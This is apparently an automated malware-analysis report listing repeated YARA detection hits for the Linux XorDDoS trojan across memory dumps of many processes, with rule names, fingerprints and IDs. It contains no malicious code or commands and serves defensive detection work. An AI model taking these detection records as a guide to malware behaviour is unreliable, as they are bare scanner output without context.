Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
